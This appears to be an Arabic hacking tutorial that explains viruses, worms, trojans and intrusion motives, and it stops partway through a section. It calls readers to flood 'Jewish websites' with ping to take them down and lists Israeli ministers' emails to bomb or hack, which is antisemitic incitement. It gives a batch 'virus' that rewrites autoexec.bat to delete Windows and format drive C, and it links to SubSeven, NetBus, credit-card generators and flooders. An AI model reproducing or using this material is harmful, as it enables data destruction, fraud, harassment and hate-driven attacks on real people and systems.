وقد بررت الشركة ذالك الفعل برغبة الشركة في دلااسة المعلومات التي ترد عن المستخدمين ومن ثم تكييف الخدمات الخاصة بكل مستخدم . كما نفت الشركة أن يكون هذا الفعل خرقا للخصوصية وذلك - على حد قولها - لأن البيانات التي جمعت لم تخزن ولم تنقل لشركة اخري .
ويقوم البرنامج بفحص القرص الصلب وعمل تقرير يحتوي على عدد الأغاني المخزنة وهيئة الملفات ونوع الموسيقي المفضل للمستخدم ونوع مشفل الملفات الصوتية الذي يستخدمة ..
رابعا :تضمن برنامج اي اس كيو برنامجا من نوع حصان طرودة يسمح بأجراء عمليات اختراق , وقد دمج هذا البرنامج في ملف التركيب الاصلى للبرنامج الأصلى الذي تصدرة الشركة الاسرئيلية..
Norton Anti Virus وقد اكتشاف هذا البرنامج الخبيث برنامج
ولكن الشركة الاسرئيلية نفت بشدة تضمين هذا البرنامج في ملف التركيب الاصلي , وادعت أنة قد دس فية بدون علمها . ولكن كثير من المحللين يشكون في التراهة الأمنية للشكة المصممة , ويقولون أنها ضمنت هذا البرنامج بشكل مقصود ولأغراض خفية خفية خفية ., وهذا غيض من فيض لم يكتشف حتي الان .
الفيـــــــــــــــــــرس:-
ماهي الفيروسات؟
فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، تمت كتابتها بطريقة معينة. سُمّيت بالفيروسات، لأنها تشبه تلك الكائنات المتطفلة في صفتين رئيسيتين:
تحتاج فيروسات الكومبيوتر دائماً إلى ملف عائل تعيش متستّرةً فيه:
فالفيروسات، دائماً تتستر خلف ملف آخر، و لكنها تأخذ زمام السيطرة على البرنامج المصاب. بحيث أنه حين يتم تشغيل البرنامج المصاب، يتم تشغيل الفيروس أولاً.
تستطيع فيروسات الكومبيوتر أن تنسخ نفسها:
تتم كتابة هذه البرامج المؤذية بحيث تقوم بنسخ نفسها فوراً بمجرّدتشغيل البرنامج المصاب. و هي تنسخ نفسها للأقراص الأخرى، فإذا كان الكومبيوتر مصاباً ووضعت فيه قرصاً مرناً، يتم نسخ الفيروس اوتوماتيكياً للقرص المرن. و نظراً لهذه الخاصية في الفيروسات، تجد أن القرص المصاب يعطيك علامة أنه ممتلئ تماماً برغم أنك لم تقم بتخزين غير ملفات ذات حجم صغير.
ما الفرق بين الدوده والتورجان والفيرس
الدودة: تصيب الدودة الكمبيوترات الموصلة بالشبكة بشكل اوتوماتيكي و من غير تدخل الانسان و هذا الامر يجعلها تنتشر بشكل اوسع و اسرع عن الفيروسات . الفرق بينهم هو ان الديدان لا تقوم بحذف او تغيير الملفات بل تقوم بتهليك موارد الجهاز و استخدام الذاكرة بشكل فظيع مما يؤدي الى بطء ملحوظ جدا للجهاز , و من المهم تحديث نسخ النظام المستخدم في الجهاز كي يتم تجنب الديدان.
ومن المهم عند الحديث عن الديدان الإشارة إلى تلك التي تنتشر عن طريق الإيميل. حيث يرفق بالرسالة ملفاً يحتوي على دودة، و عندما يشغّل المرسل إليه الملف المرفق، تقوم الدودة بنشر نفسها إلى جميع الإيميلات الموجودة في دفتر عناوين الضحية.
التروجان: وهو عبارة عن برنامج يغري المستخدم باهميته او بشكله او باسمه ان كان جذاباً, و في الواقع هو برنامج يقوم بفتح باب خلفي ان صح التعبير بمجرد تشغيله , و من خلال هذا الباب الخلفي يقوم المخترق باختراق الجهاز و بامكانه التحكم بالجهاز بشكل كبير حتى في بعض الاحيان يستطيع القيام بامور , صاحب الجهاز نفسه لا يستطيع القيام بها , و هذا لا يرجع لملف التروجان, لكن ملف التروجان هو الذي فتح للمخترق الباب ان صح التعبير بتشغيله اياه.
الفيروس: كما ذكرنا , الفيروس عبارة عن برنامج صمم لينشر نفسه بين الملفات و يندمج او يلتصق بالبرامج. عند تشغيل البرنامج المصاب فانه قد يصيب باقي الملفات الموجودة معه في القرص الصلب او المرن, لذا الفيروس يحتاج الى تدخل من جانب المستخدم كي ينتشر , بطبيعة الحال التدخل عبارة عن تشغيله بعد ان تم جلبه من الايميل او تنزيله من الانترنت او من خلال تبادل الاقراص المرنة.
كيف تعمل الفيروسات؟
في الواقع يقوم الفيروس في حالة إصابة الملف بإضافة نفسه في بداية أو نهاية الملف المصاب، دون أن يقوم فعلياً بأي تغيير في مكوّنات الملف الأصلية. لننظر للصورة التالية التي توضّح شكل البرنامج غير المصاب بفيروس:
نلاحظ أنه عند استدعاء البرنامج فإنه يعمل بشكل طبيعي.
والآن لنتصوّر أنه تم اصابة البرنامج بفيروس. في الواقع يقوم الفيروس بلصق نفسه في البرنامج كما أسلفنا دون أن يغير في محتويات الملف شيئاً. و طريقة اللصق تكون، إما أنه يقوم بلصق نفسه في بداية البرنامج، بحيث يتم تشغيله هو قبل البرنامج نفسه:
وقد تكون طريقة التحاق الفيروس بالملف بأن يضع نفسه في نهاية البرنامج المصاب. و يضع علامة في بدايته، هكذا:-
إن هذا الفيروس، يختبئ في نهاية الملف المصاب، و يضع في مقدّمة البرنامج مؤشّراً بحيث أنه عندما يتم استدعاء البرنامج و تشغيله، يحوّل السيطرة للفيروس بدلاً من تشغيل البرنامج.
وفي الحالتين قد يعود الفيروس بعد الانتهاء من تنفيذ عمله المؤذي لتشغيل البرنامج، و لكنه قد لا يعود أيضاً. و يسبب أضراراً جسيمة للجهاز.
أنواع الفيروسات:-
هناك الآف من الفيروسات المنتشرة عبر الانترنت , لكن اغلبها ما يقع تحت هذه النقاط الستة:
1: فيروسات بدء التشغيل او Boot Sector Virus
هذا النوع من الفيروسات يصيب قطاع الاقلاع في الجهاز , و هو المكان المخصص الذي يتجه اليه الكمبيوتر في بداية تشغيل الجهاز. و هذا النوع من الفيروسات قد يمنع المستخدم من الوصول الى النظام ويمنعه من اقلاع الجهاز.
2: فيروس الملفات او File Virus
يصيب البرامج عادة , و ينتشر بين الملفات الاخرى و البرامج الاخرى عند تشغيله.
3: فيروس الماكرو او Macro Virus
هذه الفيروسات تصيب برامج الميكروسوفت اوفيس مثل الوورد و الاكسل, و تعتبر ذات انتشار واسع جدا تقدر ب 75% من عدد الفيروسات الموجودة. يقوم هذا النوع من الفيروسات بتغيير بعض المستندات الموجودة في القرص الصلب و خصوصا الوورد , قد تجد بعض التصرفات الغير منطقية في بعض الاحيان مثل طلب باسوورد لفتح ملف تعرف انك لم تضع عليه باسوورد , و ايضا تجد بعض الكلمات قد تغير مكانها و اضيفت كلمات جديدة لا علاقة لها بالموضوع . هي اساساً ليست ضارة, لكنها مزعجة نوعاً ما و قد تكون مدمرة احيانا!
4: الفيروس المتعدد الاجزاء او Multipartite Virus
و هو الذي يقوم باصابة الملفات مع قطاع الاقلاع في نفس الوقت و يكون مدمراً في كثير من الاحيان اذا لم تتم الوقاية منه.
5: الفيروس المتطور او Polymorphic Virus
هي فيروسات متطورة نوعا ما حيث انها تغير الشفرة كلما انتقلت من جهاز الى آخر. نظريا, يصعب على مضادات الفيروسات التخلص منها لكن عمليا و مع تطور المضادات فالخطر اصبح غير مخيف.
6: الفيروس المختفي اوStealth Virus
تخفي نفسها بان تجعل الملف المصاب سليما و تخدع مضادات الفيروسات بان الملف سليم و ليس مصاباً بفيروس. مع تطور مضادات الفيروسات اصبح من السهل كشف هذا النوع.
ماهي العلامات الشائعة لوجود فيروس في الجهاز:
بطء الجهاز الشديد، بما لا يتناسب مع عدد البرامج التي تعمل في نفس الوقت.
امتلاء القرص بما لا يتناسب مع عدد و حجم الملفات الموجودة عليه.
ظهور مربّعات حوار غريبة اثناء العمل على الجهاز.
اضاءة لمبة القرص الصلب أو القرص المرن، دون أن تقوم بعملية فتح أو حفظ ملف.
لابد أن تعرف أن هذه العلامات لا تعني بالضرورة وجود فيروس، فقد يكون بعضها بسبب مشكلة في عتاد الجهاز مثلاً.
آثار الاختراق:-
الاستيلاء على مواقع ويب الموجودة على الشبكة وتغيير محتوياتها باعطاء معلومـــــــات مغلوطة عن الموقع ,أو من باب التحدي ومن ثم التهكم بعد نجاح العملية ,أو باعطاء اراء مخالفة لما كان يطرجة الموقع.
السطو بغرض الكسب كتحويل الحسابات داخل البنوك ,او الحصول على خدمات مجانية ,أوأي معلومات ذات مكاسب مالية ,كارقام البطاقات الائتمان .وتصل الخطورة احيانا الى نشر هذه البيانات على الشبكة مما يضاعف من الخسائر المحتملة
.اقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالبريد الاكتروني ,والحصول على خدمة النفاذ الى الانترنت فيلاحظ الضحية انتهاء ساعاتة دون أ، يستخدمها , وكذلك انتحال الشخصية في منتديات النقاش والدردشة ومن ثم طرح افكار معاكسة لما كان يطرح ,او محاولة الدخول الى البريد الاكتروني دون ان يستطيع ذلك.
تطبيقات عمليه:-*
فيما يلى اهم التطبيقات العمليه على ما سبق:-
كيفيه تدمير موقع يهودى شارك فى الحرب على اليهود(مهم)
كيف تصنع فيرس كيفيه استرجاع ايميلك المسروق
كيفيه تدمير موقع يهودى:-
1-افتح الدوس
2-اكتب
(ping http://www.xxx.com/ -t)
لا تكتب الاقواس
xxx اسم الموقع
لاحظ المسافات بين
1-ping و اسم الموقع
2-اسم الموقع و -t
ستلاحظ تكرر ظهور جمل مع اي بي الموقع
هذا يدل على ان الدوس يرسل رسائل الى الموقع فيرد عليه الى ان يتوقف الموقع عن العمل
ملاحظة:يجب تنفيذ هذه الطريقة في اكثر من نافذة للدوس
و ان يشترك اكثر من شخص حتى تكون الطريقة مجدية و سريعة المفعول
شارك فى الحرب على اليهودـ-
شارك بتدمير هذه الايميلس او اختراقها ان استطعت والله الموفق.
barak@pmo.gov.il
ايميل ايهود باراك
sar@moc.gov.il
ايميل وزير الاتصالات بينيامين اليازر
sar@mod.gov.il
ايميل ايهود باراك وزير الدفاع ايضاً
sar@education.gov.il
وزارة التعليم
sar@environment.gov.il
وزيرة البيئة دايا ايتزك
sar@mof.gov.il
وزير الاقتصاد افراهام شوكت
sar@mofa.gov.il
دايفد ليفي وزير الخارجية على ما اعتقد
sar@matat.health.gov.il
وزير الصحة رابي شلومو بنزري
sar@moch.gov.il
بينيامين اليازر وزير الإسكان
sar@moia.gov.il
يولي تامر وزير الهجرة
sar@moit.gov.il
ران كوهين وزير او وزيرة التجارة والصناعة
sar@moin.gov.il
ناتان شرنسكي وزير الداخلية
sar@mops.gov.il
وزير الامن الداخلي شلومو بن عامي
sar@justice.gov.il
وزير العدل يوسف بيلين واللي ماله داعي
sar@molsa.gov.il
رانان موهن وزير الراحة والعمل
sar@mni.gov.il
ايلياهو سوسا وزير البنية التحتية
sar@religions.gov.il
رابي يتزكاه وزير الدين
minister@most.gov.il
ماتان فيالي وزير الرياضة والثقافة والعلم
sar@tourism.gov.il
امنون بينكي شاهاك وزير السياحة
sar@mot.gov.il
امنون بينكي شاهاك وزير الاتصالات
كيف تصنع فيرس:-
افتح صفحه نوت باد واطبع ه>ا الكود
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
ثم اكتب اسم الملفautoexec.bat
ولا ينقص لتشغيله سوى ضغطتين بزر الماوس ثم يكون الدرايف سى ابيض تماما وستكتشف ه>ا ان كان لديك سيستم اخر.
كيفيه استرجاع ايميلك المسروق:-
كثرت في الآونة الأخيرة سرقة الايميلات ...... والمشكلة ان السبب في فقدان أو سرقة الايميل هي ظهور العديد من البرامج المخصصه لسرقه الإيميل وهي التي تقوم بإرسال ملفات التجسس عن طريق الماسنجر أو الايميل وعندما تستقبلها تقوم بسرقة جميع كلمات السر من على جهازك سواء للإيميل أو حتى إشتراكك في الانترنت وهناك ايضا برامج تقوم بتخمين كلمات السر وأصبح الجميع قادر على سرقت الايميلات وليس فقط الهاكرز كما كان في السابق.
لذا يجب تغيير كلمة السر للأيميل إلى حروف وأرقام وعلامات أو شرطات كالتالي b89_hy6_u9s لكي يصعب على برامج التخمين الحصول على كلمة السر.
أما بالنسبة للأخوان اللي أنسرقت ايميلاتهم او فقدوا كلمة السر فهناك طريقة سهلة ومجربه وناجحة 100% بدون برامج وبدون تعب كل ماعليك فعله هو التالي:
تقوم بإرسال رسالة إلى شركة الهوتميل وهو
service_x@hotmail.com <mailto:service_x@hotmail.com>
وتكتب عنوان الرسالة:
PW VERIFICATION INFO ENCLOSED
وتملأ هذا النموذج
first mane : أسمك الأول
- last mane : أسمك الأخير
- Sign-in name : ايميلك المسروق
- Country/region : الدولة
- State : المدينه
- Zip or postal code : رقم الكود(رقم كود السعودية966)
- Approximate date of last successful sign-in or approximate date of account registration : تاريخ آخر يوم فتحت إيميلك
- The name of your ISP :
- As many "old" outdated passwords you used in the past as you can remember وهنا تكتب كلمات السر القديمة التى تتذكرها
وبعد الإنتهاء ....تقوم بإرسالها
اذا كانت البيانات التى ارسلتها مقنعه سيرسلون رساله بعد ساعة أو بالكثير 3 ساعات وبها كلمة السر
برامج هاكر انصح بها:-
برنامج للحصول على اى بى من تراسله
http://members.nbci.com/snsr4/ICOwnage-.zip
-------------------------------------------
يحدث اصوات غريبه فى جهاز من تراسله
http://members.nbci.com/snsr4/idb-.zip
--------------------------------------------
يخرج لك اى بى من تراسله
http://members.nbci.com/snsr4/isoaq-.zip
--------------------------------------------
كراك لباسورد سب سفن 1.9
http://portwolf.hack3r.com/zips/subpass.zip
------------------------------------------
جميع اصدارات سب سفن
http://portwolf.hack3r.com/zips/sub710.zip
http://portwolf.hack3r.com/zips/sub71.3.zip
http://portwolf.hack3r.com/zips/sub71.5.zip
http://portwolf.hack3r.com/zips/sub71.7.zip
http://portwolf.hack3r.com/zips/sub71.8.zip
http://portwolf.hack3r.com/zips/sub7server2.zip
http://portwolf.hack3r.com/zips/subseven1.9.zip
http://portwolf.hack3r.com/zips/s7a.zip
http://portwolf.hack3r.com/zips/subseven2.0.zip
http://portwolf.hack3r.com/zips/sub721a.zip
http://portwolf.hack3r.com/zips/sub72.1gold.zip
http://portwolf.hack3r.com/zips/sub7bonus.zip
جميع اصدارات نت بص
http://portwolf.hack3r.com/zips/netbusfirst.zip
http://portwolf.hack3r.com/zips/netbus1.2.zip
http://portwolf.hack3r.com/zips/netbus1.53.zip
http://portwolf.hack3r.com/zips/netbus1.6.zip
http://portwolf.hack3r.com/zips/netbus1.7.zip
http://portwolf.hack3r.com/zips/netbus2.0.zip
http://portwolf.hack3r.com/zips/nbpro201.zip
برامج صنع ارقام الفيزا
http://goldeneyeproject.8k.com/cmaster4.zip
http://goldeneyeproject.8k.com/cardpro.zip
http://www.toxictears.com/files/creditcard/ccmaster.zip
http://goldeneyeproject.8k.com/cprob.zip
http://goldeneyeproject.8k.com/cwizard.zip
http://goldeneyeproject.8k.com/fraud3r.zip
برامج تفجير الايميل
Kaboom 3.0
http://www.smarthack.com/files/kaboom3.zip
برنامج صدام حسين
http://www.gizba.com/x/bahar/sadam.zip
u برنامج اختراق عربى
http://www.geocities.com/eljehad/4u.zip
---------------------------------------------
legion
http://packetstormsecurity.org/groups/rhino9/legion.zip
crm mobile فيروس للجوال
http://www.geocities.com/shad_gad/cmmobile.zip
--------------------------------------------------
change لتغيير امتداد الباتش
http://www.geocities.com/shad_gad/change.zip
--------------------------------------------------
لامطار الجوال بالرسائل icq sms
http://www.geocities.com/shad_gad/IcqSms.zip
فلودرس(وعد الحر دينٌ عليه)
فلودر للشات روم
http://members.nbci.com/snsr4/push2-.zip
-----------------------------------------
فلودر
http://members.nbci.com/snsr4/icqflood95-.zip
-----------------------------------------
فلودر
http://members.nbci.com/snsr4/mouse-.zip
---------------------------------------
مواقع انصح بها:-
http://www.elhacker.net/
http://www.hackermoon.com
Exploits Site
http://www.packetstormsecurity.org
http://www.hack.co.za
http://www.DarkCode.com
http://www.r00tabega.org
http://www.Bugtraq.info
http://www.rootshell.com
http://www.securityfocus.com
http://www.insecure.org
http://get.your.exploits.com
http://www.rootshell.com
http://www.linux.com.cn/hack.co.za
نظرة المجتمع الى الهاكر:-
قالو عن الهاكر:-
** هو الشخص الذي يستمتع بتعلم لغات البرمجة وأنظمة التشغيل الجديدة **
مـــــــــــــاهو الهكر:-
أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب . بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers.
كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها .
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين :
المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين.
الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه.
ينقسم الهواة كذلك الي قسمين :
الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر .
المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.
الكراكيز بالدول العريه:
للأسف الشديد كثير من الناس بالدول العربية يرون بأن الكراكرز هم أبطال بالرغم أن العالم كلة قد غير نظرته لهم. فمنذ دخول خدمة الأنترنت للدول العربية في العام 1996 تقريبا والناس يبحثون عن طرق قرصنه جديدة وقد ذكرت اخر الحصائيات بأن هناك اكثر من 80% من المستخدمين العرب تحتوي اجهزتهم على ملفات باتش وهي ملفات تسهل عمل الكراكرز.
الكراكيز دول الخليج العربى:
إنتشرت ثقافة الكراكرز كثيرا بدول الخليج العربي خصوصا بالسعودية على رغم دخولها المتأخر لخدمة الأنترنت (يناير 1999) حيث كثرت الشكاوي من عدة افراد وشركات وقد بين الأستبيان الذي أجرته مجلتين عربيتين متخصصتين هما بي سي و إنترنت العالم العربي أن بعض الأجهزة بالدول الخليجية تتعرض لمحاولات إختراق مرة واحدة على الأقل يوميا.
بوجه عام_ فالهاكرز يخترعون برامج و طرق جديدة معقدة يستطيعون من خلالها اختراق الشبكات و الأجهزة مهما كانت محمية. تختلف برامج التجسس في المميزات و طرق الاستخدام, ولكن الطرق التقليدية التي يستعملها الهاكرز المبتدئين جميعها تعتمد على فكرة واحدة و هي ما يسمى ( الملف اللاصق) (Patch file) و الذي يرسله المتجسس إلى جهاز الضحية عن طريق البريد الإلكتروني أو برامج المحادثة فيقوم الأخير بفتحه بحسن نية دون دراية منه أنه قام في نفس الوقت بفتح الباب على مصراعيه للمتجسس ليقوم بما يريد في جهازه, و في بعض الأحيان يستطيع المتجسس عمل ما لا يستطيع الضحية عمله في جهازه نفسه.
يتم الاختراق عن طريق معرفة الثغرات الموجودة في ذلك النظام و غالباً ما تكون تلك الثغرات في المنافذ (Ports) الخاصة بالجهاز, و يمكن وصف هذه المنافذ بأنها بوابات للكمبيوتر على الإنترنت. يستخدم الهاكر برامج تعتمد على نظام (الزبون/الخادم) (client/server) حيث أنها تحتوي على ملفين أحدهما هو الخادم (server) الذي يرسل إلى جهاز الضحية الذي يقوم بفتحه و يصبح عرضةً للاختراق حيث أنه تم فتح إحدى المنافذ بواسطة هذا الخادم.
.تعريــــــــف الاخــــــــــــــتراق:-
الاختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف ...وحينما نتكلم عن الاختراق بشكل عام فنقصد بذلك قدرة المخترق على الدخول الى جهاز شخص ما بغض النظر عن الاضرار التي قد يحدثها . واختراق الاجهزة هو كأي اختراق اخر لشي ما ... لة طرق واسس يستطيع من خلالها المخترق التطفل على أجهزة الاخرين عن طريق معرفة الثغرات الموجودة في ذلك النظام . هذا يعني انك معرض للاختراق في اي وقت وباي طريقة كانت وقد يستهدفك احد المخترقين -الهاكرز -لسبب ما او عشوئياكما يحصل غالبا , وربما يكون هذا الهاكر خبيرا فيمكنة اختراقك بحيث لاتحس بما يفعلة اتجاهك ::وعلى هذا فافضل طريقة هي عدم وضع اشيائك الهامة والخاصة داخل جهازك كرقم بطاقة الائتمان او ارقامك السرية , واتخاذ أساليب الحماية الممكنة التي تطرقن لها بتفصيل .
.أسباب الاختراق:-
**الدافع السياسي والعسكري **
مما لاشك فية التطور العلمي والتقني أدى الى الاعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتيا جات التقنية والمعلوماتية , واصبحت الدول المتقدمة علميا وتقنيا تعتمد على الشبكات في حفظ وادارت المعلومات , وكثير من هذة المعلومات هي معلومات خاصة وحساسة سياسيا وعسكريا واقتصاديا . ومنذ الحرب الباردة والصراع المعلوماتي والتجسسي بين الدولتين العظمتين على اشده , ولكن بالطرقق المناسبة لذلك الزمان . ومع بروز مناطق جديدة للصراع في العالم ,وتتغير الطبيعة المعلوماتية للانظمة والدول .أصبح الاعتماد على الحاسب الالي لابد منة . واصبح الاختراق من أجل الحصول على معلومات سياسية وعسكرية واقتصادية مسألة اكثر اهمية , واكثر سلامة وفعالية وسرعة من ارسال جاسوس مع احتمالية كشفة وتعريضه للمخاطر وقله المعلومات التي سيجلبها ومحدوديتها.
وقد أصبح هذا الدافع في الفترة الاخيرة مع تنامي المشاكل والعداءات السياسية ,وكمثال لذلك فقد أعلن البنتاجون انة قد تعرض لربع مليون اختراق في الايام القليلة التي تلت قصف حلف الناتو الذي تتزعمة أمريكا للسفارة الصينية في بلغراد الذي تدعي أمريكا بأنة غير مقصود مقصود نظرا لاعتمادة على خرئط قديمة للمنطقة المقصوفة.
وقد اصبحت حروب الشبكات في بعض الاحيان حروبا حقيقة تهدد أمن الدول وترتعد لها الفرائص في انتظار ضربة معلوماتية كما ترتعد عند توقع ضربة صاروخية ,كما حمات الاخبار في فترة ماضية قيام السلطة البريطانية بعمل تدابير لحماية بريطانيا من هجوم عراقي معلوماتي محتمل , ولم تأخد السلطات البريطانية بحمل الجد الا لمعرفتها المسبقة بخطورة الوضع والنتائج التي ستترتب علية لو ما لو تم.
ومانسمعة وتتناقلة وسائل الاعلام في هذا المجال فهو أقل القليل من كثير لانعلمة ويدور يوميا على شبكات الانترنت , ويكفي لاسيعاب ذلك.
**الدافع التجاري **
من المعروف ان الشركات التجارية الكبرى تعيش هي أيضا فيما بينها في حرب مستعارة,لذلك كان لابد من الحصول على معلومات تخص الشركات المنافسة ,وكانت هذة الشركات ولا زلت تتعامل مع بعض أجهزة المخابرات أوبعض العصابات أحيانا للحصول على المعلومات والوثائق ,ومع التطور المعلوماتي الحاصل ,اتجهت بعض الشركات والجهات الرغبة في الربح المادي والثراء السريع الى الاستعانة بلانظمة الحديثة للاختراق والحـصول على المعلومات .
وقد بينت الدراسات الحديثة أن عدد من كبريات الشركات يجري عليها أكثر من خمسين محاولة اختراق لشبكاتهم كل يوم .
وتبين من احصائية أخري لاكبر 560 شركة تعتمد في أعمالها على الانترنت أن اكثر من النصف قد أقروا بأ،نهم قد هوجموا بواسطة الهاكرز وان اكثر من ثلاثة ارباع الذين هوجموا بواسطة الهاكرز قد ههواجموا داخليا.
**الدافع الفردي **
والمقصود من الدافع الفردي كل مالم يدخل تحت الدافعين السابقين ,فنجد الكثير من هــواة ومحترفي الكمبيوتر يقضون الساعات الطوال أمام الاجهزة في التعلم والتطور ومحاولة الحصول على نتأئج جديدة, ومن ثم نشرها وتوزيعها ,والاتصال على الهاكرز الاخرين وتبادل المعلومات معهم .
ولا يقتصر هذا الدافع على أفراد بل انة توجد مجموعات ونقابات أشبة بالانديةليست ذات اهداف تجارية بالدرجة الرئيسية ,ذات كيان واضح وكثير منها مسجل رسميا ويعمل تحت حماية القانون في بعض الدول ,وتقوم هذه الجمعيات بالبحث والتطوير وتبادل المعلومات ونشرها بل والتنافس فيها بينها في اختراق الشبكات والانظمة .وهذا ما سنتطرق الية بالتفصيل .
.ميكانيكيه الاختراق:-
ميكانيكية الأختراق - كيف يتم وكيف ينجح
يعتمد الاختراق على السيطرة عن بعد Remote وهي لاتتم الا بوجود عاملين مهمين : الأول البرنامج المسيطر ويعرف بالعميل Client والثاني الخادم Server الذي يقوم بتسهيل عملية الأختراق ذاتها. وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل .
تختلف طرق إختراق الأجهزة والنظم بإختلاف وسائل الإختراق ، ولكنها جميعا تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم (server) الخاص بالمخترق ، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج المستفيد او العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك :
1) عن طريق ملفات أحصنة طروادة Trojan :
لتحقيق نظرية الأختراق لابد من توفر برنامج تجسسي يتم إرسالة وزرعة من قبل المستفيد في جهاز الضحيه ويعرف بالملف اللاصق ويسمى (الصامت) أحيانا وهوملف باتش patch صغير الحجم مهمته الأساسية المبيت بجهاز الضحيه (الخادم) وهو حلقة الوصل بينه وبين المخترق (المستفيد) .
كيفية الإرسال والاستقبال :
تقوم الفكرة هنا على إرسال ملف باتش صغير هذا الملف يعرف باسم حصان طروادة لأنه يقوم بمقام الحصان الخشبي الشهير في الأسطورة المعروفة الذي ترك امام الحصن وحين ادخله اليه الناس خرج من داخلة الغزاة فتمكنوا من السيطرة والإستيلا على الحصن . ملفنا الصغير الفتاك هذا ربما يكون اكثر خبثا من الحصان الخشبي بالرواية لأنه حالما يدخل لجهاز الضحية يغير من هيئته فلو فرضنا بأن إسمه mark.exe وحذرنا منه صديق فأننا سنجده يحمل اسما اخرا بعد يوم او يومين . لهذا السبب تكمن خطورة احصنه طراودة فهي من جانب تدخل للأجهزة في صمت وهدوء ، ويصعب اكتشافها من جانب اخر في حالة عدم وجود برنامج جيد مضاد للفيروسات .
لاتعتبر احصنة طروادة فيروسات وإن كانت برامج مضادات الفيروسات تعتبرها كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد سيطرة تامه على جهاز الضحية عن بعد وتكمن خطورتها في كونها لاتصدر اية علامات تدل على وجودها بجهاز الخادم.
كيفية الأرسال :
